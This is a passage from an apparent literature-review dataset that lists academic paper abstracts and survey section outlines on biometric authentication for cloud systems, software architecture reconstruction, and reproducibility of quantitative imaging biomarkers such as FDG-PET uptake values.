technique is used to measure the performance of the fused system. In particular, the weighted sum of score rule is used where weights are computed using equal error rate (EER) and match score distributions of the unimodal systems. The performance of the proposed multibiometric system is measured using EER and receiver operating characteristic (ROC) curve. The results show the optimum performance of the multibiometric system fusing the ECG signal with the face and fingerprint biometrics which is achieved to an EER of 0.22%, as compared to the unimodal systems that have the EER of 10.80%, 4.52% and 2.12%, respectively for the ECG signal, face and fingerprint biometrics. --- paper_title: Improvisation of Biometrics Authentication and Identification through Keystrokes Pattern Analysis paper_content: In this paper we presented one fresh approach where the authentic user's typing credentials are combined with the password to make authentication convincingly more secure than the usual password used in both offline and online transactions. With the help of empirical data and prototype implementation of the approach, we justified that our approach is ease of use, improved in security and performance. In normal approach different keystroke event timing is used for user profile creation. Keystroke latency and duration is inadequate for user authentication, which motivates exploring other matrices. In this paper we proposed combination of different matrices and calculation of degree of disorder on keystroke latency as well as duration to generate user profile. Statistical analysis on these matrices evaluates enhanced authentication process. --- paper_title: Fingerprint Verification Using Spectral Minutiae Representations paper_content: Most fingerprint recognition systems are based on the use of a minutiae set, which is an unordered collection of minutiae locations and orientations suffering from various deformations such as translation, rotation, and scaling. The spectral minutiae representation introduced in this paper is a novel method to represent a minutiae set as a fixed-length feature vector, which is invariant to translation, and in which rotation and scaling become translations, so that they can be easily compensated for. These characteristics enable the combination of fingerprint recognition systems with template protection schemes that require a fixed-length feature vector. This paper introduces the concept of algorithms for two representation methods: the location-based spectral minutiae representation and the orientation-based spectral minutiae representation. Both algorithms are evaluated using two correlation-based spectral minutiae matching algorithms. We present the performance of our algorithms on three fingerprint databases. We also show how the performance can be improved by using a fusion scheme and singular points. --- paper_title: Robust Algorithm for Fingerprint Identification with a Simple Image Descriptor paper_content: The paper describes a fingerprint recognition system consisting of image preprocessing, filtration, feature extraction and matching for recognition. The image preprocessing includes normalization based on mean value and variation. The orientation field is extracted and Gabor filter is used to prepare the fingerprint image for further processing. For singular point detection the Poincare index with partitioning method is used. The ridgeline thinning is presented and so is the minutia extraction by CN algorithm. Different Toeplitz matrix descriptions are in the work. Their behavior against abstract set of points is tested. The presented algorithm has proved its successful use in identification of shifted, rotated and partial acquired fingerprints without additional scaling. --- paper_title: Human Authentication Based on ECG Waves Using Radon Transform paper_content: Automated security is one of the major concerns of modern times. Secure and reliable authentication systems are in great demand. A biometric trait like electrocardiogram (ECG) of a person is unique and secure. In this paper, we propose a human authentication system based on ECG waves considering a plotted ECG wave signal as an image. The Radon Transform is applied on the preprocessed ECG image to get a radon image consisting of projections for θ varying from 0 o to 180 o . The pairwise distance between the columns of Radon image is computed to get a feature vector. Correlation Coefficient between feature vector stored in the database and that of input image is computed to check the authenticity of a person. Then the confusion matrix is generated to find False Acceptance Ratio (FAR) and False Rejection Ratio (FRR). This methodology of authentication is tested on ECG wave data set of 105 individuals taken from Physionet QT Database. The proposed authentication system is found to have FAR of about 3.19% and FRR of about 0.128%. The overall accuracy of the system is found to be 99.85%. --- paper_title: Design and Analysis of a Highly User-Friendly, Secure, Privacy-Preserving, and Revocable Authentication Method paper_content: A large portion of system breaches are caused by authentication failure, either during the login process or in the post-authentication session; these failures are themselves related to the limitations associated with existing authentication methods. Current authentication methods, whether proxy based or biometrics based, are not user-centric and/or endanger users' (biometric) security and privacy. In this paper, we propose a biometrics based user-centric authentication approach. This method involves introducing a reference subject (RS), securely fusing the user's biometrics with the RS, generating a BioCapsule (BC) from the fused biometrics, and employing BCs for authentication. Such an approach is user friendly, identity bearing yet privacy-preserving, resilient, and revocable once a BC is compromised. It also supports “one-click sign-on” across systems by fusing the user's biometrics with a distinct RS on each system. Moreover, active and non-intrusive authentication can be automatically performed during post-authentication sessions. We formally prove that the secure fusion based approach is secure against various attacks. Extensive experiments and detailed comparison with existing approaches show that its performance (i.e., authentication accuracy) is comparable to existing typical biometric approaches and the new BC based approach also possesses many desirable features such as diversity and revocability. --- paper_title: Biohashing : two factor authentication featuring fingerprint data and tokenised random number paper_content: Abstract Human authentication is the security task whose job is to limit access to physical locations or computer network only to those with authorisation. This is done by equipped authorised users with passwords, tokens or using their biometrics. Unfortunately, the first two suffer a lack of security as they are easy being forgotten and stolen; even biometrics also suffers from some inherent limitation and specific security threats. A more practical approach is to combine two or more factor authenticator to reap benefits in security or convenient or both. This paper proposed a novel two factor authenticator based on iterated inner products between tokenised pseudo-random number and the user specific fingerprint feature, which generated from the integrated wavelet and Fourier–Mellin transform, and hence produce a set of user specific compact code that coined as BioHashing. BioHashing highly tolerant of data capture offsets, with same user fingerprint data resulting in highly correlated bitstrings. Moreover, there is no deterministic way to get the user specific code without having both token with random data and user fingerprint feature. This would protect us for instance against biometric fabrication by changing the user specific credential, is as simple as changing the token containing the random data. The BioHashing has significant functional advantages over solely biometrics i.e. zero equal error rate point and clean separation of the genuine and imposter populations, thereby allowing elimination of false accept rates without suffering from increased occurrence of false reject rates. --- paper_title: Fingerprint-Based Fuzzy Vault: Implementation and Performance paper_content: Reliable information security mechanisms are required to combat the rising magnitude of identity theft in our society. While cryptography is a powerful tool to achieve information security, one of the main challenges in cryptosystems is to maintain the secrecy of the cryptographic keys. Though biometric authentication can be used to ensure that only the legitimate user has access to the secret keys, a biometric system itself is vulnerable to a number of threats. A critical issue in biometric systems is to protect the template of a user which is typically stored in a database or a smart card. The fuzzy vault construct is a biometric cryptosystem that secures both the secret key and the biometric template by binding them within a cryptographic framework. We present a fully automatic implementation of the fuzzy vault scheme based on fingerprint minutiae. Since the fuzzy vault stores only a transformed version of the template, aligning the query fingerprint with the template is a challenging task. We extract high curvature points derived from the fingerprint orientation field and use them as helper data to align the template and query minutiae. The helper data itself do not leak any information about the minutiae template, yet contain sufficient information to align the template and query fingerprints accurately. Further, we apply a minutiae matcher during decoding to account for nonlinear distortion and this leads to significant improvement in the genuine accept rate. We demonstrate the performance of the vault implementation on two different fingerprint databases. We also show that performance improvement can be achieved by using multiple fingerprint impressions during enrollment and verification. --- paper_title: Provably Secure Remote Truly Three-Factor Authentication Scheme With Privacy Protection on Biometrics paper_content: A three-factor authentication scheme combines biometrics with passwords and smart cards to provide high-security remote authentication. Most existing schemes, however, rely on smart cards to verify biometric characteristics. The advantage of this approach is that the user's biometric data is not shared with remote server. But the disadvantage is that the remote server must trust the smart card to perform proper authentication which leads to various vulnerabilities. To achieve truly secure three-factor authentication, a method must keep the user's biometrics secret while still allowing the server to perform its own authentication. Our method achieves this. The proposed scheme fully preserves the privacy of the biometric data of every user, that is, the scheme does not reveal the biometric data to anyone else, including the remote servers. We demonstrate the completeness of the proposed scheme through the GNY (Gong, Needham, and Yahalom) logic. Furthermore, the security of our proposed scheme is proven through Bellare and Rogaway's model. As a further benefit, we point out that our method reduces the computation cost for the smart card. --- paper_title: An efficient biometrics-based remote user authentication scheme using smart cards paper_content: In this paper, we propose an efficient biometric-based remote user authentication scheme using smart cards, in which the computation cost is relatively low compared with other related schemes. The security of the proposed scheme is based on the one-way hash function, biometrics verification and smart card. Moreover, the proposed scheme enables the user to change their passwords freely and provides mutual authentication between the users and the remote server. In addition, many remote authentication schemes use timestamps to resist replay attacks. Therefore, synchronized clock is required between the user and the remote server. In our scheme, it does not require synchronized clocks between two entities because we use random numbers in place of timestamps. --- paper_title: Blind Authentication: A Secure Crypto-Biometric Verification Protocol paper_content: Concerns on widespread use of biometric authentication systems are primarily centered around template security, revocability, and privacy. The use of cryptographic primitives to bolster the authentication process can alleviate some of these concerns as shown by biometric cryptosystems. In this paper, we propose a provably secure and blind biometric authentication protocol, which addresses the concerns of user's privacy, template protection, and trust issues. The protocol is blind in the sense that it reveals only the identity, and no additional information about the user or the biometric to the authenticating server or vice-versa. As the protocol is based on asymmetric encryption of the biometric data, it captures the advantages of biometric authentication as well as the security of public key cryptography. The authentication protocol can run over public networks and provide nonrepudiable identity verification. The encryption also provides template protection, the ability to revoke enrolled templates, and alleviates the concerns on privacy in widespread use of biometrics. The proposed approach makes no restrictive assumptions on the biometric data and is hence applicable to multiple biometrics. Such a protocol has significant advantages over existing biometric cryptosystems, which use a biometric to secure a secret key, which in turn is used for authentication. We analyze the security of the protocol under various attack scenarios. Experimental results on four biometric datasets (face, iris, hand geometry, and fingerprint) show that carrying out the authentication in the encrypted domain does not affect the accuracy, while the encryption key acts as an additional layer of security. --- paper_title: Security performance evaluation for biometric template protection techniques paper_content: Biometric template protection techniques are able to provide a solution for vulnerability which compromises biometric template. These are expected to be useful for remote biometric authentication. However, there were no supported standard evaluation method, thus making these technology not fully trusted. The draft Recommendation ITU-T X.gep: 'A guideline for evaluating telebiometric template protection techniques' which is currently under development at ITU-T SG 17 Question 9 (telebiometrics) aims to fill this need. ITU-T X.gep describes a general guideline for testing and reporting the performance of biometric template protection techniques based on biometric cryptosystem and cancellable biometrics. This guideline specifies two reference models for evaluation which use biometric template protection techniques in telebiometrics system. Then, it defines the metrics, procedures, and requirements for testing and evaluating the performance of the biometric template protection techniques. In addition, this Recommendation ITU-T X.gep has been approved at April 2012, and pre-published as ITU-T X.1091. --- paper_title: Generating Cancelable Fingerprint Templates paper_content: Biometrics-based authentication systems offer obvious usability advantages over traditional password and token-based authentication schemes. However, biometrics raises several privacy concerns. A biometric is permanently associated with a user and cannot be changed. Hence, if a biometric identifier is compromised, it is lost forever and possibly for every application where the biometric is used. Moreover, if the same biometric is used in multiple applications, a user can potentially be tracked from one application to the next by cross-matching biometric databases. In this paper, we demonstrate several methods to generate multiple cancelable identifiers from fingerprint images to overcome these problems. In essence, a user can be given as many biometric identifiers as needed by issuing a new transformation "key". The identifiers can be cancelled and replaced when compromised. We empirically compare the performance of several algorithms such as Cartesian, polar, and surface folding transformations of the minutiae positions. It is demonstrated through multiple experiments that we can achieve revocability and prevent cross-matching of biometric databases. It is also shown that the transforms are noninvertible by demonstrating that it is computationally as hard to recover the original biometric identifier from a transformed version as by randomly guessing. Based on these empirical results and a theoretical analysis we conclude that feature-level cancelable biometric construction is practicable in large biometric deployments --- paper_title: A Generic Framework for Three-Factor Authentication: Preserving Security and Privacy in Distributed Systems paper_content: As part of the security within distributed systems, various services and resources need protection from unauthorized use. Remote authentication is the most commonly used method to determine the identity of a remote client. This paper investigates a systematic approach for authenticating clients by three factors, namely password, smart card, and biometrics. A generic and secure framework is proposed to upgrade two-factor authentication to three-factor authentication. The conversion not only significantly improves the information assurance at low cost but also protects client privacy in distributed systems. In addition, our framework retains several practice-friendly properties of the underlying two-factor authentication, which we believe is of independent interest. --- paper_title: Robust elliptic curve cryptography-based three factor user authentication providing privacy of biometric data paper_content: Recently, to achieve privacy protection using biometrics, Fan and Lin proposed a three-factor authentication scheme based on password, smart card and biometrics. However, the authors have found that Fan and Lin's proposed scheme (i) has flaws in the design of biometrics privacy, (ii) fails to maintain a verification table, making it vulnerable to stolen-verifier attack and modification attack, and (iii) is vulnerable to insider attacks. Thus, the authors propose an elliptic curve cryptography-based authentication scheme that is improved with regard to security requirements. The authors’ proposed scheme overcomes the flaws of Fan and Lin's scheme and is secured from attacks. Furthermore, the authors have presented a security analysis of their scheme to show that their scheme is suitable for the biometric systems. --- paper_title: Generating Cancelable Fingerprint Templates paper_content: Biometrics-based authentication systems offer obvious usability advantages over traditional password and token-based authentication schemes. However, biometrics raises several privacy concerns. A biometric is permanently associated with a user and cannot be changed. Hence, if a biometric identifier is compromised, it is lost forever and possibly for every application where the biometric is used. Moreover, if the same biometric is used in multiple applications, a user can potentially be tracked from one application to the next by cross-matching biometric databases. In this paper, we demonstrate several methods to generate multiple cancelable identifiers from fingerprint images to overcome these problems. In essence, a user can be given as many biometric identifiers as needed by issuing a new transformation "key". The identifiers can be cancelled and replaced when compromised. We empirically compare the performance of several algorithms such as Cartesian, polar, and surface folding transformations of the minutiae positions. It is demonstrated through multiple experiments that we can achieve revocability and prevent cross-matching of biometric databases. It is also shown that the transforms are noninvertible by demonstrating that it is computationally as hard to recover the original biometric identifier from a transformed version as by randomly guessing. Based on these empirical results and a theoretical analysis we conclude that feature-level cancelable biometric construction is practicable in large biometric deployments ---
Title: A Survey of Security and Privacy Issues for Biometrics Based Remote Authentication in Cloud Section 1: Introduction Description 1: Provide a general overview of the increasing volume of digital content, the benefits and challenges of cloud environments, and highlight the importance of secure remote user authentication using biometrics. Section 2: Security Challenges Faced by Biometrics Techniques Description 2: Discuss the various security threats and challenges associated with biometrics features, including spoofing attacks, false detection, and limitations in data acquisition technologies. Section 3: Literature Survey Description 3: Offer a detailed review of existing works on cloud security and remote authentication, focusing on singular and multimodal biometrics features and additional security measures to protect biometrics templates. Section 4: Authentication Based on Singular Biometrics Features Description 4: Elaborate on various biometrics-based authentication techniques in the cloud such as fingerprint verification, keystroke analysis, and ECG-based authentication, along with their respective strengths and weaknesses. Section 5: Authentication Systems with Encrypted Biometrics Features Description 5: Describe different methods of protecting biometrics templates through encryption and transformation techniques, and discuss multi-factor authentication systems that enhance security and privacy. Section 6: Analysis Description 6: Present a comparative analysis of different biometrics traits based on performance metrics like true acceptance rate and true rejection rate, and discuss the trade-off between security and privacy in these systems. Section 7: Open Issues Description 7: Identify and describe several research gaps and future directions for creating effective frameworks that balance security and privacy, energy-efficient multimodal biometrics schemes, and cost-effective means for recording biometrics features. Section 8: Conclusion Description 8: Summarize the importance of secure remote authentication in cloud environments, highlight the findings of the survey, and emphasize the need for further research to improve biometrics-based authentication systems.
Software Architecture Reconstruction Method, a Survey
11
--- paper_title: Software architecture reconstruction: An approach based on combining graph clustering and partitioning paper_content: This article proposes an approach of improving the accuracy of automatic software architecture reconstruction. Many research uses clustering for the purpose of architectural reconstruction. Our work improves the results of coupling/cohesion driven clustering by combining it with a partitioning preprocessing that establishes a layering of the classes of the system. Two simple and not really efficient algorithms for software clustering are improved by applying this approach, as it is shown in the validation section. --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations shouldperform software architecture reconstructions. However,few organizations are willing to pay for the effort. Softwarearchitecture reconstruction must be viewed not as an efforton its own but as a contribution in a broader technicalcontext, such as the streamlining of products into a productline or the modernization of systems that hit theirarchitectural borders. In these contexts software architectsfrequently need to reason about existing systems, forexample to lower adoption and technical barriers for newtechnology approaches. We propose a Quality AttributeDriven Software Architecture Reconstruction (QADSAR)approach where this kind of reasoning is driven by theanalysis of quality attribute scenarios.This paper introduces a quality attribute driven perspectiveon software architecture reconstruction. It presents atechnical reasoning framework and illuminates theinformation that is required from the reconstruction processto link the knowledge gained back to the business goals ofan organization. The paper illustrates the techniques bypresenting a real-world case study. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: CaCOphoNy: metamodel-driven software architecture reconstruction paper_content: Far too often, architecture descriptions of existing software systems are out of sync with the implementation. If they are, they must be reconstructed, but this is a very challenging task. The first problem to be solved is to define what "software architecture" means in the company. The answer can greatly vary, especially among the many stakeholders. In order to solve this problem, This work presents CaCOphoNy, a generic metamodel-driven process for reconstructing software architecture. This work provides a methodological guide and shows how metamodels can be used (1) to define architectural viewpoints, (2) to link these viewpoints to existing metaware and (3) to drive architecture reconstruction processes. The concepts presented Were identified over the last decade in the context of Dassault Systemes, one of the largest software companies in Europe, with more than 1200 developers. CaCOphoNy is however a very generic process pattern, and as such it can be applied in many other contexts. This process pattern is in line with the MDA and ADM approaches from the OMG. It also complies with the IEEE Standard 1471 for software architecture. A megamodel integrating these standards is presented. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations shouldperform software architecture reconstructions. However,few organizations are willing to pay for the effort. Softwarearchitecture reconstruction must be viewed not as an efforton its own but as a contribution in a broader technicalcontext, such as the streamlining of products into a productline or the modernization of systems that hit theirarchitectural borders. In these contexts software architectsfrequently need to reason about existing systems, forexample to lower adoption and technical barriers for newtechnology approaches. We propose a Quality AttributeDriven Software Architecture Reconstruction (QADSAR)approach where this kind of reasoning is driven by theanalysis of quality attribute scenarios.This paper introduces a quality attribute driven perspectiveon software architecture reconstruction. It presents atechnical reasoning framework and illuminates theinformation that is required from the reconstruction processto link the knowledge gained back to the business goals ofan organization. The paper illustrates the techniques bypresenting a real-world case study. --- paper_title: Software Architecture in Practice paper_content: The award-winning and highly influential Software Architecture in Practice, Third Edition, has been substantially revised to reflect the latest developments in the field. In a real-world setting, the book once again introduces the concepts and best practices of software architecturehow a software system is structured and how that systems elements are meant to interact. Distinct from the details of implementation, algorithm, and data representation, an architecture holds the key to achieving system quality, is a reusable asset that can be applied to subsequent systems, and is crucial to a software organizations business strategy. The authors have structured this edition around the concept of architecture influence cycles. Each cycle shows how architecture influences, and is influenced by, a particular context in which architecture plays a critical role. Contexts include technical environment, the life cycle of a project, an organizations business profile, and the architects professional practices. The authors also have greatly expanded their treatment of quality attributes, which remain central to their architecture philosophywith an entire chapter devoted to each attributeand broadened their treatment of architectural patterns. If you design, develop, or manage large software systems (or plan to do so), you will find this book to be a valuable resource for getting up to speed on the state of the art. Totally new material covers Contexts of software architecture: technical, project, business, and professional Architecture competence: what this means both for individuals and organizations The origins of business goals and how this affects architecture Architecturally significant requirements, and how to determine them Architecture in the life cycle, including generate-and-test as a design philosophy; architecture conformance during implementation; architecture and testing; and architecture and agile development Architecture and current technologies, such as the cloud, social networks, and end-user devices --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations shouldperform software architecture reconstructions. However,few organizations are willing to pay for the effort. Softwarearchitecture reconstruction must be viewed not as an efforton its own but as a contribution in a broader technicalcontext, such as the streamlining of products into a productline or the modernization of systems that hit theirarchitectural borders. In these contexts software architectsfrequently need to reason about existing systems, forexample to lower adoption and technical barriers for newtechnology approaches. We propose a Quality AttributeDriven Software Architecture Reconstruction (QADSAR)approach where this kind of reasoning is driven by theanalysis of quality attribute scenarios.This paper introduces a quality attribute driven perspectiveon software architecture reconstruction. It presents atechnical reasoning framework and illuminates theinformation that is required from the reconstruction processto link the knowledge gained back to the business goals ofan organization. The paper illustrates the techniques bypresenting a real-world case study. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Software architecture reconstruction: An approach based on combining graph clustering and partitioning paper_content: This article proposes an approach of improving the accuracy of automatic software architecture reconstruction. Many research uses clustering for the purpose of architectural reconstruction. Our work improves the results of coupling/cohesion driven clustering by combining it with a partitioning preprocessing that establishes a layering of the classes of the system. Two simple and not really efficient algorithms for software clustering are improved by applying this approach, as it is shown in the validation section. ---
Title: Software Architecture Reconstruction Method, a Survey Section 1: INTRODUCTION Description 1: This section provides an overview of the necessity for software architecture reconstruction, the problems that arise with old software systems, and the iterative process of reconstruction. Section 2: LITERATURE REVIEW Description 2: This section presents an extended review of existing research on software architecture reconstruction, including terminology, factors leading to reconstruction, and techniques used. Section 3: Bottom up Techniques Description 3: This section describes the bottom-up technique for gathering information from lower levels, tools like ARMIN and Rigi used for this purpose, and the visualization of reconstructed views. Section 4: Top down approaches Description 4: This section explains the top-down approaches which start with high-level knowledge and verify it against the source code. Section 5: Hybrid approaches Description 5: This section discusses hybrid approaches that combine top-down and bottom-up methods, highlighting tools like Cacophony, Symphony, and Nimeta. Section 6: SOFTWARE QUALITY ATTRIBUTES Description 6: This section delves into the importance of quality attributes in software architecture, determining their influence on software features, and how they can be supported or conflicted. Section 7: QUALITY ATTRIBUTES DRIVEN SOFTWARE ARCHITECTURE RECONSTRUCTION Description 7: This section introduces a framework for quality attribute-driven architecture reconstruction and discusses application contexts and scenarios. Section 8: INTERFACE IDENTIFICATION Description 8: This section covers reverse engineering techniques for identifying software interfaces by analyzing source code. Section 9: CLUSTER BASED ARCHITECTURE RECONSTRUCTION Description 9: This section explains clustering approaches in software systems, the types of clustering algorithms, and their applications. Section 10: COMPARATIVE ANALYSIS Description 10: This section provides a comparative analysis of top-down, bottom-up, and hybrid approaches, including their advantages and drawbacks. Section 11: CONCLUSION Description 11: This section summarizes the findings of the survey, concludes that the bottom-up approach is most appropriate, and suggests future work with tools like ARMIN.
Quantitative imaging biomarkers: A review of statistical methods for computer algorithm comparisons
13
--- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: The FDA Critical Path Initiative and Its Influence on New Drug Development paper_content: Societal expectations about drug safety and efficacy are rising while productivity in the pharmaceutical industry is falling. In 2004, the US Food and Drug Administration introduced the Critical Path Initiative with the intent of modernizing drug development by incorporating recent scientific advances, such as genomics and advanced imaging technologies, into the process. An important part of the initiative is the use of public-private partnerships and consortia to accomplish the needed research. This article explicates the reasoning behind the Critical Path Initiative and discusses examples of successful consortia. --- paper_title: A Collaborative Enterprise for Multi-Stakeholder Participation in the Advancement of Quantitative Imaging paper_content: We have formed the Quantitative Imaging Biomarker Alliance to enable cooperation and address issues in quantitative medical imaging by adapting the successful Integrating the Healthcare Enterprise precedent to the needs of imaging science. --- paper_title: Reproducibility of Standardized Uptake Value Measurements Determined by 18F-FDG PET in Malignant Tumors paper_content: 18 F-FDG PET is increasingly being used to monitor the early response of malignant tumors to chemotherapy. Understanding the reproducibility of standardized uptake values (SUVs) is an important prerequisite in estimating what constitutes a significant change. Methods: Twenty-six patients were studied on 2 separate occasions (mean interval ± SD, 3 ± 2 d; range, 1-5 d). A static PET/CT scan was performed 94 ± 9 min after the intravenous injection of 383 ± 15 MBq of 18 F-FDG. Mean and maximum SUVs (SUV mean and SUV max , respectively) were determined for regions of interest drawn around the tumor on the first study and for the same regions of interest transferred to the second study. Results: SUV mean in tumors ranged from 1.49 to 17.48 and SUV max ranged from 2.99 to 24.09. The correlation between SUV mean determined on the 2 separate visits was 0.99; the mean difference between the 2 measurements was 0.01 ± 0.27 SUV. The 95% confidence limits for the measurements were ±0.53. For SUV max , the mean difference was -0.05 ± 1.14 SUV. Conclusion: Our study demonstrates that repeated measurements of SUV mean performed a few days apart are highly reproducible. A decrease of 0.5 in the SUV is statistically significant. --- paper_title: Reproducibility of Metabolic Measurements in Malignant Tumors Using FDG PET paper_content: PET using 18 F-fluorodeoxyglucose (FDG) is increasingly applied to monitor the response of malignant tumors to radiotherapy and chemotherapy. The aim of this study was to assess the reproducibility of serial FDG PET measurements to define objective criteria for the evaluation of treatment-induced changes. Methods : Sixteen patients participating in phase I studies of novel antineoplastic compounds were examined twice by FDG PET within 10 d while they were receiving no therapy. Standardized uptake values (SUVs), FDG net influx constants (K i ), glucose normalized SUVs (SUV gluc ) and influx constants (K i,gluc ) were determined for 50 separate lesions. The precision of repeated measurements was determined on a lesion-by-lesion and a patient-by-patient basis. Results: None of the parameters showed a significant increase or decrease at the two examinations. The differences of repeated measurements were approximately normally distributed for all parameters with an SD of the mean percentage difference of about 10%. The 95% normal ranges for spontaneous fluctuations of SUV, SUV gluc , K i and K i,gluc were determined to be ±0.91, ±1.14, ±0.52 mL/100 g/min and ±0.64 mU100 g/min, respectively. Analysis on a lesion-by-lesion basis yielded similar results. Conclusion: FDG PET provides several highly reproducible quantitative parameters of tumor glucose metabolism. Changes of a parameter that are outside the 95% normal range determined in this study may be used to define a metabolic response to therapy. --- paper_title: The Lung Image Database Consortium (LIDC) and Image Database Resource Initiative (IDRI): a completed reference database of lung nodules on CT scans. paper_content: PURPOSE ::: The development of computer-aided diagnostic (CAD) methods for lung nodule detection, classification, and quantitative assessment can be facilitated through a well-characterized repository of computed tomography (CT) scans. The Lung Image Database Consortium (LIDC) and Image Database Resource Initiative (IDRI) completed such a database, establishing a publicly available reference for the medical imaging research community. Initiated by the National Cancer Institute (NCI), further advanced by the Foundation for the National Institutes of Health (FNIH), and accompanied by the Food and Drug Administration (FDA) through active participation, this public-private partnership demonstrates the success of a consortium founded on a consensus-based process. ::: ::: ::: METHODS ::: Seven academic centers and eight medical imaging companies collaborated to identify, address, and resolve challenging organizational, technical, and clinical issues to provide a solid foundation for a robust database. The LIDC/IDRI Database contains 1018 cases, each of which includes images from a clinical thoracic CT scan and an associated XML file that records the results of a two-phase image annotation process performed by four experienced thoracic radiologists. In the initial blinded-read phase, each radiologist independently reviewed each CT scan and marked lesions belonging to one of three categories ("nodule > or =3 mm," "nodule <3 mm," and "non-nodule > or =3 mm"). In the subsequent unblinded-read phase, each radiologist independently reviewed their own marks along with the anonymized marks of the three other radiologists to render a final opinion. The goal of this process was to identify as completely as possible all lung nodules in each CT scan without requiring forced consensus. ::: ::: ::: RESULTS ::: The Database contains 7371 lesions marked "nodule" by at least one radiologist. 2669 of these lesions were marked "nodule > or =3 mm" by at least one radiologist, of which 928 (34.7%) received such marks from all four radiologists. These 2669 lesions include nodule outlines and subjective nodule characteristic ratings. ::: ::: ::: CONCLUSIONS ::: The LIDC/IDRI Database is expected to provide an essential medical imaging research resource to spur CAD development, validation, and dissemination in clinical practice. --- paper_title: Variance of SUVs for FDG-PET/CT is greater in clinical practice than under ideal study settings. paper_content: PURPOSE ::: Measurement variance affects the clinical effectiveness of PET-based measurement as a semiquantitative imaging biomarker for cancer response in individual patients and for planning clinical trials. In this study, we measured test-retest reproducibility of SUV measurements under clinical practice conditions and recorded recognized deviations from protocol compliance. ::: ::: ::: METHODS ::: Instrument performance calibration, display, and analyses conformed to manufacture recommendations. Baseline clinical (18)F-FDG PET/CT examinations were performed and then repeated at 1 to 7 days. Intended scan initiation uptake period was to repeat the examinations at the same time for each study after injection of 12 mCi FDG tracer. Avidity of uptake was measured in 62 tumors in 21 patients as SUV for maximum voxel (SUV(max)) and for a mean of sampled tumor voxels (SUV(mean)). ::: ::: ::: RESULTS ::: The range of SUV(max) and SUV(mean) was 1.07 to 21.47 and 0.91 to 14.69, respectively. Intraclass correlation coefficient between log of SUV(max) and log of SUV(mean) was 0.93 (95% confidence interval [CI], 0.88-0.95) and 0.92 (95% CI, 0.87-0.95), respectively.Correlation analysis failed to show an effect on uptake period variation on SUV measurements between the 2 examinations, suggesting additional sources of noise.The threshold criteria for relative difference from baseline for the 95% CI were ± 49% or ± 44% for SUV(max) or SUV(mean), respectively. ::: ::: ::: CONCLUSIONS ::: Variance of SUV for FDG-PET/CT in current clinical practice in a single institution was greater than expected when compared with benchmarks reported under stringent efficacy study settings. Under comparable clinical practice conditions, interpretation of changes in tumor avidity in individuals and assumptions in planning clinical trials may be affected. --- paper_title: Lung cancer: reproducibility of quantitative measurements for evaluating 2-[F-18]-fluoro-2-deoxy-D-glucose uptake at PET. paper_content: PURPOSE ::: To study the precision of repeated 2-[fluorine-18]-fluoro-2-deoxy-D-glucose (FDG) uptake measurements at positron emission tomography (PET) in patients with primary lung cancer. ::: ::: ::: MATERIALS AND METHODS ::: Ten patients with untreated lung cancer underwent two dynamic FDG PET examinations after a 4-hour fast within 1 week. Kinetic modeling of tumor FDG uptake was performed on the basis of a three-compartment model. The tumor concentration of F-18 (standardized uptake value calculated on the basis of predicted lean body mass [SUV-lean]) was also measured 50-60 minutes after injection of a tracer. Blood glucose, insulin, and free fatty acid levels were monitored. ::: ::: ::: RESULTS ::: SUV-lean and the FDG influx constant Ki were measured with a mean +/- standard deviation difference of 10% +/- 7 and 10% +/- 8, respectively, over repeated PET scans. The mean difference was reduced to 6% +/- 